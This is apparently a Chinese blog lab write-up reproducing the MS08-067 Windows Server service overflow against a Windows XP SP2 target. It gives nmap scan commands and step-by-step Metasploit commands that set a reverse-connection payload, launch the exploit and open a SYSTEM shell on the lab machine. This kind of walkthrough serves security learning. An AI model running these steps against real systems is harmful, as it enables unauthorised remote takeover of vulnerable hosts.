Windows XP SP2 (Simplified Chinese MS08_067漏洞复现)
文章目录
- 一、漏洞详情
- 二、靶机搭建
- kali
- Windows XP SP2 (Simplified Chinese )
- 三、利用nmap对靶机扫描
- 四、漏洞利用
- 五、总结
一、漏洞详情
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。
二、靶机搭建
kali
Windows XP SP2 (Simplified Chinese )
下载平台:
https://next.itellyou.cn/Original/
下载链接:
ed2k://|file|sc_winxp_pro_with_sp2.iso|629227520|505B810E128351482AF8B83AC4D04FD2|/
(1)、配置IP:
(2)、关闭防火墙:
三、利用nmap对靶机扫描
(1)、利用nmap探测主机存活:
注:发现Windows XP SP2 (Simplified Chinese)的IP:172.16.12.101
nmap -sP -T4 172.16.12.0/24
(2)、利用nmap自带脚本对目标IP扫描:
nmap -sT -A --script=vuln -P0 172.16.12.101
注:发现Windows XP SP2 (Simplified Chinese)存在多个漏洞:ms17-010,ms08-067,且目标靶机445端口开放,但是我们现在只考虑ms08-067。
四、漏洞利用
(1)、搜索 MS08_067漏洞:
search ms08
(2)、选择MS08_067漏洞:
use 0
(3)、查看MS08_067漏洞的payloads:
show payloads
(4)、选择42号payload:
set payload 42
(5)、查看MS08_067漏洞所适用的Windows版本:
show targets
(6)、设置对应的目标靶机Windows版本:
set target 10
(7)、查看payload的详细信息:
show options
(8)、配置靶机ip,靶机开放端口,反向连接地址为攻击机ip,设置攻击机监听tcp端口号:
注:通过nmap得知靶机开放端口为445,所以默认设置。反向连接地址为攻击机ip,攻击机监听tcp端口号默认设置。
set rhosts 172.16.12.101
(9)、初始化攻击环境,并开始对目标靶机进行攻击:
exploit
(10)、进入目标系统的互交命令行shll中:
shell
(1)、用ipconfig验证:
ipconfig
五、总结
写到这里,这篇文章就介绍结束了,通过本次实验我们复现了MS08-067远程代码执行漏洞,涉及漏洞发现、验证漏洞、利用漏洞的完整过程,并利用Metasploit工具进行shell反弹及深入理解.
这也是我初入渗透测试的第一次漏洞复现,以后再接再厉,祝大家学而不缀!
Windows XP SP2 (Simplified Chinese MS08_067漏洞复现)相关推荐
- 如何在单台计算机上配置 Windows XP SP2 网络保护技术
简介 连接至 Internet 的计算机可能会出现安全漏洞并遭受***. ***是指绕过计算机安全保护或导致您无法使用计算机的故意行为. 在 Microsoft Windows XP Service ...
- [转载]受 Windows XP SP2 影响的软件列表
Microsoft Windows XP Service Pack 2 (SP2) 中引入了一些新特性用来提高系统的安全和性能.但是这些更新也影响了一些应用程序在操作系统上的正常功能.官方近日提供了一 ...
- Windows xp sp2详细安装过程详解
前言: 先来一堆废话......啊啊啊啊啊~~ 现在我们基本上都用不到xp系统了,至少在个人的笔记本上应该不用了,但是某些单位或企业的机房里的台式电脑还是xp系统,所有这也给不怀好意的攻击者提供了攻击 ...
- Windows XP SP2疑难速解50问
一.SP2的十大亮点 要想系统地了解Windows XP SP2可能会引起的问题,并快速诊断问题的原因所在,应先对Windows XP SP2的新功能有个基本的了解,这就是Windows XP S ...
- 使用 MDT2008 轻量部署进行 Windows XP SP2 简单部署
使用 MDT2008 轻量部署进行 Windows XP SP2 简单部署 [url]http://www.yangzhip.net.cn/article.asp?id=12[/url] 转载于:ht ...
- 关于windows xp sp2/sp3 中tcpip.sys对于Raw socket的限制
WINDOWS XP SP2修改了TCPIP.SYS,增加了对于RAW SOCKET的发送和伪造源地的限制,详情如下 : 1) 不能通过raw socket发送TCP报文.做此尝试时会得到10004号 ...
- WINDOWS XP SP2 NTFS EFS加密文件的解密案例
北京一用户,原系统分为3个区,C盘安装WINDOWS XP SP2,D及E盘为用户重要数据区,其中D盘有用户特别重要的几个文件,当初为安全性考虑,设置了NTFS的EFS加密,后系统运行缓慢,重装 ...
- IMPORTANT: BizTalk Server 2004 fixes for Windows XP SP2 and .NET FW 1.1 SP1
Scott Woodgate 的EMail中说: IMPORTANT: BizTalk Server 2004 fixes for Windows XP SP2 and .NET FW 1.1 SP ...
- Windows XP SP2下载[转自Mydrivers.com]
微软今天在官方网站Downloads当中提供英文版和德文版Windows XP SP2下载,其中SP2英文版官方文件名是WindowsXP-KB835935-SP2-ENU.exe,文件大小27239 ...
最新文章
- [转] 程序员面试题精选100题(35)-找出两个链表的第一个公共结点
- SectionIndexer中的getSectionForPosition()与getPositionForSection()解惑
- 前端开发神器 vscode 常用快捷键
- springboot项目根据不同的环境启动不同的配置,如开发环境dev,测试环境sit,生产环境application...
- linux下查看一个进程的启动时间和运行时间
- node.js 模块_如何创建Node JS可重用模块
- Axure RP 10 安装方法
- android google GMS服务包安装
- 计算机课教师评价,教师课堂评价语集锦
- 用10行代码实现鉴黄
- 初识Java反序列化
- postgresql中DROP OWNED BY user_name对普通用户和只读用户的区别
- STEP2——《数据分析:企业的贤内助》重点摘要笔记(六)——数据描述
- 纯html5的树形菜单,一个简单的js树形菜单
- 基于任务点的加速仿真
- VRP介绍以及AC初始化配置介绍
- dllreg解除服务器注册,最简单的修复IE浏览器的方法:注册表重新注册DLL
- Fortinet :《2021 年OT与网络安全现状报告》之「OT安全洞察」
- pdf解析,获取字段数据
- 历届国际足联世界足球先生
热门文章
- OO包设计原则遵循度自动分析检查工具JDM简介(原创)
- 程序员约架事件中,薛非到底是因为不会用Github还是不会写Tokenizer而没有应战?...
- 吴恩达OpenAI最新课程:prompt-engineering-for-developers读书笔记
- Qt之自定义QLineEdit
- 计算机专业英语教程(第二版)Chapter 4 Database Fundamentals
- 比 Elasticsearch 更快 RediSearch + RedisJSON = 王炸
- 伦敦的威斯敏斯特大教堂地下室的墓碑林中,一块震撼全世界的一段碑文。
- Ubuntu16.04 anaconda 上安装 opencv
- 编程中汉字编码和英文编码的语言融合
- 9月30日科技资讯|罗永浩与锤子手机撇清关系;微软回应「高管传奇」经历;Rust 1.38 稳定版发布